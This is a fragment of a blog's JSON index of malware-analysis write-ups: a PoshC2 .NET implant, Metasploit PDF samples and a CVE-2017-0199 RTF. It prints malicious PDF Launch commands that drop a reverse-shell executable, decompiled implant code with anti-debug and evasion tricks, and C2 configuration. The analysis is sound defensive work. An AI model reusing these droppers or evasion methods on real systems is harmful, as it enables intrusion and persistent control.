never touching disk\n1Beacon, BeaconSleepMillis, Jitter mscoree.dll (C2 logic) 2GenerateUri, StageUrl, URIs mscoree.dll (C2 logic) 3GetCommands, SendTaskOutputString mscoree.dll (C2 logic) 4DownloadString, UploadData System.Net (WebClient) - beacon loop: sleep with jitter -\u0026gt; contact C2 -\u0026gt; receive commands -\u0026gt; send output\n- GenerateUri: randomizes request URLs to evade pattern-based detection\n1ProxyUrl, ProxyUser, ProxyPassword mscoree.dll (config) 2UserAgent, HttpReferrer mscoree.dll (config) 3set_ServerCertificateValidationCallback System.Net 4AllowUntrustedCertificates mscoree.dll - custom User-Agent, Referrer, proxy support\n- SSL certificate validation disabled: allows self-signed C2 certs, MITM-friendly\n1PadWithImageData, ImageDataObfuscator mscoree.dll (C2 logic) 2Images, ExtractImages mscoree.dll (config) - steganography: C2 traffic disguised as image data\n1RijndaelManaged, AesCryptoServiceProvider System.Security.Cryptography 2Encrypt, Decrypt, CreateEncryptor mscoree.dll 3Key, GenerateIV mscoree.dll - AES encryption of all C2 traffic\n1GetEnvironmentalInfo, GetCurrentProcess mscoree.dll / System.Diagnostics 2get_UserName, get_UserDomainName System 3IsHighIntegrity, WindowsPrincipal.IsInRole System.Security.Principal 4GetEnvironmentVariable System - system reconnaissance: username, domain, process name, PID\n- IsHighIntegrity: checks for admin/SYSTEM privileges\nstrings # 1PAGE_EXECUTE_READWRITE 2SW_HIDE 3MULTI_COMMAND_PREFIX 4COMMAND_SEPARATOR - PAGE_EXECUTE_READWRITE - VirtualProtect constant, confirms shellcode injection capability\n- SW_HIDE — hides console window on startup\n- MULTI_COMMAND_PREFIX / COMMAND_SEPARATOR — supports batched command execution from C2\n1reversedBase64Config 2!d-3dion@LD!-d hardcoded key (used in PoshC2) 3==wFR4yT0nuXyBLNH... reversed base64 ~600 chars (offset 0x04B25DE9) 4sI1bBV0hgqeoBBbXa/KqQx8... base64 (offset 0x04B2629C) - large reversed base64 blob (~600 chars) — embedded encrypted C2 configuration\n1run-exe command 2run-dll command 3run-temp-appdomain command 4update-config command 5load-module command 6run-dll-background command 7run-exe-background command 8run-assembly-background command 9set-delegates command 10download-file command 11run-assembly command 12beacon command 13exit command 14multicmd command prefix - full C2 command dispatcher confirmed\n- run-assembly / run-exe / run-dll — arbitrary in-memory code execution\n- run-*-background — background task execution in separate threads\n- load-module — dynamic loading of new modules pushed from C2\n- download-file — exfiltration or additional staging\n- update-config — live reconfiguration\n1{0}/{1}{2}/?{3} URL format string 2SessionID={0} cookie/param 3Host 4User-Agent 5Referer - URL template {0}/{1}{2}/?{3} — randomized C2 url generation to evade pattern detection\n- SessionID in cookie — mimics legitimate web session to blend into normal traffic\nOverall conclusion: Strings confirm and extend the picture from imports — this is a PoshC2 C# implant (Stager/Dropper):\nTwo-stage architecture: this binary is the stager, loads Stage2-Core.exe entirely in memory Embedded encrypted config: large base64 blob with C2 parameters, decoded via reverse + AES Full command loop: 13+ commands including live config update and modular payload loading Traffic masking: SessionID cookie, custom HTTP headers, randomized URL patterns Operational security: KillDate enforced, temporary AppDomains, all operations fileless running in Sandbox # Ran ANY.RUN sandbox with Fake Net enabled. Sample sends 2 HTTP requests over ~40 seconds (beacon interval). - url pattern /vfe01s/1/vsopts.js/?c directly matches hardcoded format string {0}/{1}{2}/?{3}\nHTTP Request:\n1URL /vfe01s/1/vsopts.js/?c 2Protocol HTTP/1.1 3Method GET 4Cookie SessionID=nINTTfojq1v9MITeQO+JRekWX1/+Nqc6/BMwBNX6MaW6Wr 5 PdAzMWsLM/mYMLtMCokYOzh0jpmBMmDUCxfkytXVuMqxpQ/IECzNPp 6 KiI2ia/3OdtLwM8Qjk6mdnBJyza 7User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) 8 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 9Host 192.168.248.128 10Connection Keep-Alive - uses legitimate Chrome User-Agent - this is the initial beacon fingerprint sent to C2 on first check-in\n- outbound TCP to 192.168.248.128:443 initiated 1288ms after process start - traffic over port 443 (HTTPS)\nreversing in DNSpy # Started analysis from Main() function, which calls Sharp().\n1public static void Main() 2{ 3 Program.Sharp(0L, 0L); 4} anti-analysis # The Sharp() function starts by hiding the console window.\n1public static void Sharp(long callbackFunc = 0L, long baseAddress = 0L) 2{ 3 Internals.ShowWindow(Internals.GetConsoleWindow(), 0); 4 byte[] array = new byte[0]; 5...[snip]... Next it performs an anti-debug technique using a throw/catch exception. if the debugger is not attached, it triggers a divide-by-zero exception, which is caught by the catch (Exception) block where the main code begins execution. if the debugger is attached — no exception is thrown and the implant proceeds with an empty config, effectively disabling itself.\n1try 2{ 3 IntPtr intPtr = new IntPtr(0L); 4 long num; 5 if (Debugger.IsAttached) 6 { 7 num = baseAddress; 8 } 9 else 10 { 11 num = baseAddress / intPtr.ToInt64(); // intentional divide-by-zero 12 } 13 array = Encoding.BigEndianUnicode.GetBytes(num.ToString()); 14} 15catch (Exception) 16...[snip]... Inside the catch block, the Config() constructor is initialized with hardcoded encrypted data.\n1try 2{ 3...[snip]... 4 Config config = new Config(\u0026#34;==wFR4yT0nuXyBLNHGAHcm51H/B3CjLNxlp6/k3YhokMiGKy4cWkNtmW6Werm1nHWI4yPTbEchk4pGl54J4YH+d43Edan+kOVjPF/wMkpp7Jc3uXiBjCNEJSQNlNHL6ouI06gjISjsdqPTcLLN2JKAxYLSDtAUkarsF6AVXWknO4DYtUCO2xvwQvf43y4cdLNpuDhVUZv1P3emAcfl1EEA83qYGqIxiJsXvaVR/Nxgrl2/jqVO9XtBEMRkJgP/3JrTPgxp3P3kqIu0/WZvp7YApAXQTO8HRir077rNlcXOxqo1/jVsMTSSk3yiIv7nvmQfyMM/fCTp3o4Oeo6Bq/8/A3RH6gPB4sqNXhU4kVSQerYkP4dSKrKR+jfDYfKqr26TQuduOTcEI9E3tVvZXvZaWqDVUtvFdLviPO89B4Uzs5Wz9S709m91DLFgU0PDlubKyTPmR1qyM4JclfJbW9a60YdYsIm346hq38+Y2IHroOJUhmufrnXAHeX0yTmGq8nNGDpnQm8DpGm4At4MjdSgK0YW6HRWRYB4yoU07cv4hvZPvhXCChNk+fl4i9RDwcj7YtrY7fR4Nw+1us/nE6fsfM\u0026#34;, \u0026#34;sI1bBV0hgqeoBBbXa/KqQx8FSWe/jqKFF9TBxehGxxc=\u0026#34;); 5 Program.Init(config); 6...[snip]... 7} 8catch (Exception ex) Config(config, key) receives the encrypted config as a reversed base64 string. the string is first reversed, then passed along with the key to Decrypt(). the decrypted result contains another base64 string which is decoded again, producing plaintext that is passed to ParseConfigString(). Decrypt() extracts the first 16 bytes from the decrypted data as the IV, then constructs the cipher via CreateAlgorithm(key, iv). CreateAlgorithm() implements AES-CBC with a 128-bit block size and 256-bit key. To extract the plaintext config, a Python script was written to replicate the C# decryption logic: - reverse the base64 string - decode base64 → ciphertext bytes - first 16 bytes = IV, remaining bytes = ciphertext - decode key from base64 - decrypt using AES-CBC - decode result as base64 once more to get plaintext config\n1from Crypto.Cipher import AES 2import base64 3 4rev_b64 = (\u0026#34;==wFR4yT0nuXyBL...fsfM\u0026#34;) 5b64_key = \u0026#34;sI1bBV0hgqeoBBbXa/KqQx8FSWe/jqKFF9TBxehGxxc=\u0026#34; 6 7b64 = rev_b64[::-1] 8ciphertext = base64.b64decode(b64) 9 10iv = ciphertext[:16] 11ct = ciphertext[16:] 12 13key = base64.b64decode(b64_key) 14 15cipher = AES.new(key, AES.MODE_CBC, iv) 16dec = cipher.decrypt(ct) 17 18dec = dec.rstrip(b\u0026#39;\\x00\u0026#39;) 19text = dec.decode(\u0026#39;utf-8\u0026#39;) 20raw = base64.b64decode(text) 21config = raw.decode(\u0026#39;utf-8\u0026#39;) 22 23print(config) config decryption result # Running the decryption script against the embedded config produces the following plaintext:\n1true;30;60;;;;;TW96aWxsYS81LjAg...;;2999-01-01;1;https://192.168.248.128,;https://192.168.248.128,;;;/vfe01s/1/vsopts.js/?c;;5s;0.2;Qqz6czYCfkrmlba4dF16YLO1vJq13piIlFlN+5o06/g=;;; parsed config fields:\n1RetriesEnabled true 2RetryLimit 30 3StageWaitTimeMillis 60 4UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) 5 AppleWebKit/537.36 Chrome/80.0.3987.122 Safari/537.36 6 (base64 decoded from TW96aWxsYS81LjAg...) 7KillDate 2999-01-01 8ImplantId 1 9StageUrl https://192.168.248.128 10BeaconCommsUrl https://192.168.248.128 11URI /vfe01s/1/vsopts.js/?c 12BeaconSleep 5s 13Jitter 0.2 (20%) 14Key Qqz6czYCfkrmlba4dF16YLO1vJq13piIlFlN+5o06/g= KillDate: 2999-01-01 — effectively disabled, implant runs indefinitely BeaconSleep: 5s with Jitter: 0.2 — beacon interval is 5 seconds ±20%, confirms ~40s gap observed in sandbox was due to fake.net retry backoff, not the configured sleep UserAgent field matches exactly the User-Agent observed in HTTP request during sandbox analysis Key — AES session key used for encrypting beacon communications (separate from config decryption key) StageUrl and BeaconCommsUrl both point to 192.168.248.128 — single C2 server for both staging and ongoing communication URI: /vfe01s/1/vsopts.js/?c — confirms the exact path observed in sandbox network capture Init() → Stage() → CommandLoop() analysis # Init() — main execution entry point, called after config decryption and validation checks pass. It calls Stage() for initial C2 check-in, then enters CommandLoop() indefinitely\n1private static void Init(Config config) 2{ 3 IComms comms = new HttpComms(config); 4 Program._sendData = new Action\u0026lt;string, byte[]\u0026gt;(comms.SendTaskOutputBytes); 5 Program.Stage(config, comms); 6 Program.CommandLoop(config, comms); 7} CommandLoop() — main beacon loop, runs until KillDate.\n1while (!(DateTime.ParseExact(config.KillDate, \u0026#34;yyyy-MM-dd\u0026#34;, ...) \u0026lt; DateTime.Now)) - loop continues as long as current date is before KillDate\n- KillDate: 2999-01-01 extracted from config — implant runs indefinitely\ntask parsing:\n1string text2 = text.Substring(0, 5); // first 5 chars = task ID 2string command = text.Substring(5); // remainder = command string - every command received from C2 is prefixed with a 5-character task ID\n- task ID is used when sending output back to C2 to correlate responses\nbatch command support:\n1commands.Replace(\u0026#34;multicmd\u0026#34;, \u0026#34;\u0026#34;).Split(new string[]{\u0026#34;!d-3dion@LD!-d\u0026#34;}, ...) - multicmd prefix signals multiple commands in a single response - !d-3dion@LD!-d is the hardcoded delimiter separating individual commands - both strings were identified during static strings analysis\ncommand dispatcher:\n1exit -\u0026gt; dispose comms, terminate loop 2run-temp-appdomain -\u0026gt; execute assembly in isolated temporary AppDomain 3update-config -\u0026gt; live reconfiguration via config.Refresh() 4load-module -\u0026gt; load Stage2-Core assembly into memory, wire delegates 5run-dll/exe-background -\u0026gt; execute assembly in background thread 6run-dll/exe -\u0026gt; execute assembly in current thread 7run-assembly-background -\u0026gt; run ephemeral assembly in background thread 8run-assembly -\u0026gt; run ephemeral assembly in current thread 9set-delegates -\u0026gt; rewire Stage2-Core function pointers 10download-file -\u0026gt; execute via RunCoreAssembly, send output to C2 11beacon -\u0026gt; update sleep interval via SLEEP_REGEX parser 12\u0026lt;unknown command\u0026gt; -\u0026gt; fallback: passed to RunCoreAssembly (all custom modules) C2 communication layer # Constructor initializes the steganography module ImageDataObfuscator for hiding C2 data inside image payloads, and disables SSL validation via AllowUntrustedCertificates() to allow self-signed certificates on the C2 server.\n1internal HttpComms(Config config) 2{ 3 this._config = config; 4 this._imageDataObfuscator = new HttpComms.ImageDataObfuscator(config); 5 Utils.AllowUntrustedCertificates(); 6} Stage() — initial C2 check-in. Environmental fingerprint is AES-encrypted and sent as SessionID cookie, confirmed by sandbox HTTP capture. C2 URL is constructed from StageCommsChannels key + StageUrl from decrypted config.\n1string cookie = Encryption.Encrypt(this._config.Key, environmentalInfo, false); 2string address = text + this._config.StageUrl; 3WebClient webClient = this.GetWebClient(cookie, hostHeader); 4string base64EncodedCiphertext = webClient.DownloadString(address); Steganographic payload padding # PadWithImageData() disguises outbound C2 data by prepending a real image followed by random noise, making the payload appear as a legitimate image file to network inspection tools.\n1internal byte[] PadWithImageData(byte[] data) 2{ 3 int num = data.Length + 1500; 4 string s = this._config.Images[new Random().Next(0, this._config.Images.Count)]; 5 byte[] array = Convert.FromBase64String(s); 6 byte[] bytes = Encoding.UTF8.GetBytes(HttpComms.ImageDataObfuscator.RandomString(1500 - array.Length)); 7 byte[] array2 = new byte[num]; 8 Array.Copy(array, 0, array2, 0, array.Length); 9 Array.Copy(bytes, 0, array2, array.Length, bytes.Length); 10 Array.Copy(data, 0, array2, array.Length + bytes.Length, data.Length); 11 return array2; 12} Final payload structure is [image bytes] + [random noise] + [actual data], total size is always data.Length + 1500 bytes. Image is randomly selected from the Images list in decrypted config and base64-decoded. Noise fills the remaining space up to the 1500-byte header using RandomString().\nRandomString() generates noise by sampling random characters from a fixed charset, producing unpredictable but low-entropy padding.\n1private static string RandomString(int length) 2{ 3 return new string((from s in Enumerable.Repeat\u0026lt;string\u0026gt;(\u0026#34;...................@..........................Tyscf\u0026#34;, length) 4 select s[Program.RANDOM.Next(s.Length)]).ToArray\u0026lt;char\u0026gt;()); 5} The fixed charset \u0026quot;...................@..........................Tyscf\u0026quot; was visible as a raw string in the strings analysis at offset 0x04B25D81.\n","date":"November 23, 2025","externalUrl":null,"permalink":"/investigations/dropper-cs.exe-analysis/","section":"","summary":"C2 .NET implant. AES-encrypted config, HTTPS beacon to 192.168.248.128, fileless in-memory execution, anti-debug via divide-by-zero.","title":"PoshC2: Dropper-cs.exe","type":"investigations"},{"content":" TL;DR # A malicious PDF contains no JavaScript or embedded file objects — instead, a Launch action executes cmd.exe with an inline VBScript command that reads hex-encoded bytes directly from the PDF body, decodes them into a PE32 executable, and runs it. The payload establishes a Metasploit reverse shell to 192.168.248.129:4444.\nInitial Analysis # 1$ file * 2evil.pdf: PDF document, version 1.5 Static Analysis # pdfid showed no JavaScript but confirmed /OpenAction and /Launch:\n1$ pdfid evil.pdf 2PDFiD 0.2.10 evil.pdf 3 /JS 0 4 /JavaScript 0 5 /OpenAction 1(1) 6 /Launch 1(1) 7 /EmbeddedFile 0 Unlike the previous sample, there is no JavaScript and no embedded file object — the payload is hidden in plain sight inside the PDF body itself.\npdf-parser revealed the Launch action in obj 5:\n1$ pdf-parser evil.pdf 2obj 5 0 3 Type: /Action 4 /S /Launch 5 /F (cmd.exe) 6 /P (/C echo Set o=CreateObject^(\u0026#34;Scripting.FileSystemObject\u0026#34;^): 7 Set f=o.OpenTextFile^(\u0026#34;evil.pdf\u0026#34;,1,True^): 8 f.SkipLine: 9 Set w=CreateObject^(\u0026#34;WScript.Shell\u0026#34;^): 10 Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\u0026#34;%TEMP%\u0026#34;^)+\u0026#34;\\\\msf.exe\u0026#34;,2,True^): 11 a=Split^(Trim^(Replace^(f.ReadLine,\u0026#34;\\\\x\u0026#34;,\u0026#34; \u0026#34;^)^)^): 12 for each x in a:g.Write^(Chr^(\u0026#34;\u0026amp;h\u0026#34; ^\u0026amp; x^)^):next: 13 g.Close:f.Close \u0026gt; 1.vbs \u0026amp;\u0026amp; cscript //B 1.vbs \u0026amp;\u0026amp; 14 start %TEMP%\\\\msf.exe \u0026amp;\u0026amp; del /F 1.vbs) The command does the following:\nWrites an inline VBScript to 1.vbs The VBScript opens evil.pdf itself, skips the first line (PDF header), and reads the second line which contains hex-encoded bytes in \\xNN format Decodes each hex byte using Chr(\u0026quot;\u0026amp;h\u0026quot; \u0026amp; x) and writes the result to %TEMP%\\msf.exe Executes msf.exe and deletes 1.vbs The social engineering message \u0026quot;To view the encrypted content please tick the Do not show this message again box and press Open\u0026quot; is appended to trick the user into clicking Open, which triggers the Launch action.\nInspecting the PDF body confirmed the hex-encoded payload on the second line:\n1$ cat evil.pdf 2%PDF-1.5 3\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00... \\x4d\\x5a = MZ — PE32 magic bytes, confirming an executable is embedded directly in the PDF body.\nThe payload was extracted with:\n1$ grep -oP \u0026#39;\\\\x\\K[0-9a-fA-F]{2}\u0026#39; evil.pdf | xxd -r -p \u0026gt; mw.bin 2 3$ file mw.bin 4mw.bin: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 5 sections Dynamic Analysis # The extracted PE was executed in a sandbox. It established a connection to 192.168.248.129 over port 4444 — a default Metasploit reverse shell port.\nIOCs # Files\n- evil.pdf — malicious PDF, payload carrier\n- %TEMP%\\msf.exe — decoded PE32 reverse shell\n- 1.vbs — temporary VBScript dropper (self-deleted)\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 4444/tcp\n","date":"November 22, 2025","externalUrl":null,"permalink":"/investigations/metasploit-adobe_pdf_embedded_exe_nojs/","section":"","summary":"A malicious PDF uses a Launch action to execute cmd.exe, which runs an inline VBScript that reads hex-encoded shellcode directly from the PDF body, writes it to disk as an executable, and launches a Metasploit reverse shell.","title":"Metasploit: adobe_pdf_embedded_exe_nojs","type":"investigations"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/pdf-parser/","section":"Tags","summary":"","title":"Pdf-Parser","type":"tags"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/pdfid/","section":"Tags","summary":"","title":"Pdfid","type":"tags"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/vbscript/","section":"Tags","summary":"","title":"VBScript","type":"tags"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/cve-2017-0199/","section":"Tags","summary":"","title":"CVE-2017-0199","type":"tags"},{"content":" TL;DR # A malicious PDF uses two chained actions: an OpenAction triggers JavaScript that exports an embedded template.pdf object to disk, while a Launch action executes cmd.exe to run it. The exported file is not a PDF but a PE32 executable that establishes a reverse shell to 192.168.248.129:4444.\nInitial Analysis # 1$ file * 2evil.pdf: PDF document, version 1.0, 1 page(s) pdfid revealed several suspicious indicators:\n1$ pdfid evil.pdf 2PDFiD 0.2.10 evil.pdf 3 /JS 1 4 /JavaScript 1 5 /AA 1 6 /OpenAction 1 7 /Launch 1 The presence of /JavaScript, /OpenAction, and /Launch together is a strong indicator of a malicious document — the PDF will automatically execute code upon opening.\npdf-parser was used to examine each object in detail. The key objects are:\nobj 9 — OpenAction that fires JavaScript on open:\n1/S /JavaScript 2/JS (this.exportDataObject({ cName: \u0026#34;template\u0026#34;, nLaunch: 0 });) This silently exports the embedded template.pdf object to disk without launching it.\nobj 10 — Launch action that executes cmd.exe:\n1/S /Launch 2/Type /Action 3/Win 4 \u0026lt;\u0026lt; 5 /F (cmd.exe) 6 /D \u0026#39;(c:\\\\\\\\windows\\\\\\\\system32)\u0026#39; 7 /P \u0026#39;(/Q /C %HOMEDRIVE%\u0026amp;cd %HOMEPATH%\u0026amp;(if exist \u0026#34;Desktop\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Desktop\u0026#34;))\u0026amp;(if exist \u0026#34;My Documents\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;My Documents\u0026#34;))\u0026amp;(if exist \u0026#34;Documents\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Documents\u0026#34;))\u0026amp;(if exist \u0026#34;Escritorio\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Escritorio\u0026#34;))\u0026amp;(if exist \u0026#34;Mis Documentos\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Mis Documentos\u0026#34;))\u0026amp;(start template.pdf)\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nTo view the encrypted content please check the \u0026#34;Do not show this message again\u0026#34; box and press Open.)\u0026#39; 8 \u0026gt;\u0026gt; The social engineering message at the end is shown in a dialog box to trick the user into clicking \u0026ldquo;Open\u0026rdquo;, which triggers the Launch action and executes template.pdf (the dropped PE).\nobj 8 — the embedded payload stream. Extracted with:\n1$ pdf-parser --object 8 --filter --raw evil.pdf \u0026gt; template.bin The raw stream starts with MZ — a PE32 magic bytes header:\n1b\u0026#39;MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00... A Python script was used to parse and write the binary:\n1import ast 2 3with open(\u0026#39;template.bin\u0026#39;, \u0026#39;r\u0026#39;) as f: 4 content = f.read() 5 6start = content.find(\u0026#34;b\u0026#39;\u0026#34;) + 2 7end = content.rfind(\u0026#34;\u0026#39;\u0026#34;) 8data = ast.literal_eval(\u0026#34;b\u0026#39;\u0026#34; + content[start:end] + \u0026#34;\u0026#39;\u0026#34;) 9 10with open(\u0026#39;template.exe\u0026#39;, \u0026#39;wb\u0026#39;) as f: 11 f.write(data) 1$ file template.exe 2template.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 5 sections Sandbox # The extracted PE was executed in a sandbox. It established a connection to 192.168.248.129 over port 4444 — a default Metasploit reverse shell port.\nIOCs # Files\n- evil.pdf — malicious PDF document\n- template.exe — embedded PE32 reverse shell payload\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 4444/tcp\n","date":"November 21, 2025","externalUrl":null,"permalink":"/investigations/metasploit-adobe-pdf-embedded-file/","section":"","summary":"A malicious PDF exploits JavaScript and Launch actions to extract and execute an embedded PE payload, establishing a reverse shell connection to an attacker-controlled server.","title":"Metasploit: adobe-pdf-embedded-file","type":"investigations"},{"content":" TL;DR # A malicious RTF document contains an embedded OLE2Link object that, upon opening, silently fetches a remote HTA file from 192.168.248.129:8080 and executes it via mshta.exe — no user interaction required beyond opening the document.\nInitial Analysis # 1msf.doc: Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025 rtfobj identified an embedded OLE object of class OLE2Link containing a URL pointing to a remote HTA file:\n1$ rtfobj msf.doc 2=============================================================================== 3File: \u0026#39;msf.doc\u0026#39; - size: 5743 bytes 4---+----------+--------------------------------------------------------------- 5id |index |OLE Object 6---+----------+--------------------------------------------------------------- 70 |000001B4h |format_id: 2 (Embedded) 8 | |class name: b\u0026#39;OLE2Link\u0026#39; 9 | |data size: 2560 10 | |MD5 = \u0026#39;053ba4dffb352244944dba6f29957f4c\u0026#39; 11 | |CLSID: 00000300-0000-0000-C000-000000000046 12 | |StdOleLink (embedded OLE object - Known Related to 13 | |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174) 14 | |Possibly an exploit for the OLE2Link vulnerability (VU#921560, 15 | |CVE-2017-0199) 16 | |URL extracted: http://192.168.248.129:8080/default.hta 17---+----------+--------------------------------------------------------------- CVE-2017-0199 is a Microsoft Office vulnerability that allows a malicious RTF document to automatically fetch and execute a remote HTA file via mshta.exe when the document is opened — without requiring macros to be enabled or any additional user interaction.\nIOCs # Files\n- msf.doc — malicious RTF document\n- MD5: 053ba4dffb352244944dba6f29957f4c\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 8080/tcp\n- Payload URL: http://192.168.248.129:8080/default.hta\n","date":"November 21, 2025","externalUrl":null,"permalink":"/investigations/metasploit-office_word_hta/","section":"","summary":"A malicious RTF document exploits CVE-2017-0199 via an embedded OLE2Link object to fetch and execute a remote HTA payload from an attacker-controlled server.","title":"Metasploit: office_word_hta","type":"investigations"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/rtf/","section":"Tags","summary":"","title":"RTF","type":"tags"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/rtfobj/","section":"Tags","summary":"","title":"Rtfobj","type":"tags"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"}]